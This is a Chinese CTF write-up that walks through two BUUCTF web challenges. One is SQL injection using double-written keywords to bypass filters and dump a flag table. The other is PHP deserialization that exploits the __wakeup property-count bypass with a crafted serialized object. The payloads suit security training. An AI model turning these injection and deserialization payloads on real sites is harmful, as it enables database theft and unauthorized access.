BUUCTF——WEB(6)

Bug.ink2026-01-09 9:31

目录

[[极客大挑战 2019]BabySQL 1](#[极客大挑战 2019]BabySQL 1)

sql注入

[[极客大挑战 2019]PHP 1](#[极客大挑战 2019]PHP 1)

php反序列化

[极客大挑战 2019]BabySQL 1

sql注入

尝试万能密码

复制代码 
1' or 1=1#

123

尝试联合查询

复制代码 
1' order by 1#

123

or 和 by都被过滤

尝试双写绕过

复制代码 
1' oorrder bbyy 2#

123

双写绕过可行

联合查询深度利用

尝试

复制代码 
1' oorrder bbyy 4#

123

出现报错

则所查询的数据表有三列

构造查询

复制代码 
1' union select 1,2,3#

123

union select 被过滤

再次尝试双写

复制代码 
1' uunionnion sselectelect 1,2,3#

123

根据回显,查找数据

复制代码 
1' uunionnion sselectelect 1,database(),version()#

123
复制代码 
1' uunionnion sselectelect 1,database(),group_concat(table_name) from information_schema.tables where table_schema=geek#

123

报错,因为字符中的or被过滤,

经过测试where,from都被过滤

继续双写

复制代码 
1' uunionnion sselectelect 1,database(),group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#

123

好像在当前查询数据库中,没有相关表,

继续查看数据库

复制代码 
1' uunionnion sselectelect 1,2,group_concat(schema_name) frfromom infoorrmation_schema.schemata#

123

有一个ctf数据库,

尝试注入ctf数据库中的数据表

复制代码 
1' uunionnion sselectelect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf'#

123

数据表为Flag表,查询列名

复制代码 
1' uunionnion sselectelect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema='ctf'#

123

Flag表中又一个字段flag

查询flag字段数据

复制代码 
1' uunionnion sselectelect 1,2,group_concat(flag) frfromom ctf.Flag#

123

[极客大挑战 2019]PHP 1

php反序列化

网站备份

进行目录爆破,查找备份文件

访问www.zip发现源码泄露

提交查看是错误的

查看index.php

存在反序列化函数 unserialize()

unserialize() 是 PHP 中专门用于 "反序列化" 的函数,作用是将序列化后的字符串还原为 PHP 对象 / 数据结构,这是反序列化操作的标志性函数。

$select = $_GET['select']; 表示:$select 的值是从 URL 的 GET 参数(?select=xxx)中获取的,用户可以自定义传入任意内容

包含class.php并且有一个反序列化点

核心逻辑与漏洞点分析

先拆解 Name 类的关键魔术方法和限制条件,明确利用目标:

关键绕过技巧

  • PHP 存在一个经典漏洞(PHP < 5.6.25/7.0.10):当序列化字符串中声明的属性数量 > 类实际的属性数量 时,__wakeup 不会被触发。
  • 本类实际属性数是 2($username$password),只需把序列化字符串中的属性数从 2 改成 3 即可绕过。

构造反序列化 Payload

查看class.php

思路:username值为admin,password值为100,可以输出flag

构造反序列化payload

复制代码 
<?php
class Name{
    private $username = 'admin';
    private $password = '100';
}
$a= new Name();
$res=serialize(@$a);   
echo $res
?>

输出反序列化字符串

复制代码 
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

这里我们发现Nameusername与前面的14不对应,少了两个字符,而Namepassword也是少了两个字符,这是因为username和password变量是private类型,变量中的类名前后会有空白符

Name前后需要添加%00

同时要绕过_wakeup(),还要将Name后面的数字修改为大于2的数。

结果:

复制代码 
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

get传参:

复制代码 
?select=O:4:"Name":4:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
相关推荐
哆啦A梦15885 小时前
Springboot整合MyBatis实现数据库操作
数据库·spring boot·mybatis
Zzzzmo_5 小时前
【MySQL】JDBC(含settings.xml文件配置/配置国内镜像以及pom.xml文件修改)
数据库·mysql
FirstFrost --sy7 小时前
MySQL内置函数
数据库·mysql
2401_879693877 小时前
将Python Web应用部署到服务器(Docker + Nginx)
jvm·数据库·python
reembarkation7 小时前
光标在a-select,鼠标已经移出,下拉框跟随页面滚动
java·数据库·sql
eggwyw7 小时前
MySQL-练习-数据汇总-CASE WHEN
数据库·mysql
星轨zb7 小时前
通过实际demo掌握SpringSecurity+MP中的基本框架搭建
数据库·spring boot·spring security·mp
treacle田7 小时前
达梦数据库-配置本地守护进程dmwatcher服务-记录总结
数据库·达梦数据库·达梦数据库local数据守护
wyt5314298 小时前
Redis的安装教程(Windows+Linux)【超详细】
linux·数据库·redis
CeshirenTester8 小时前
从数据库到结构化用例:一套可落地的测试智能体架构
数据库·架构
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03围棋-html版本04小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)05班级宠物园部署指南06OpenClaw 使用和管理 MCP 完全指南07UV安装并设置国内源08OpenClaw Control UI安全上下文访问配置09“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)10OpenClaw Gateway 频繁断开/重启问题诊断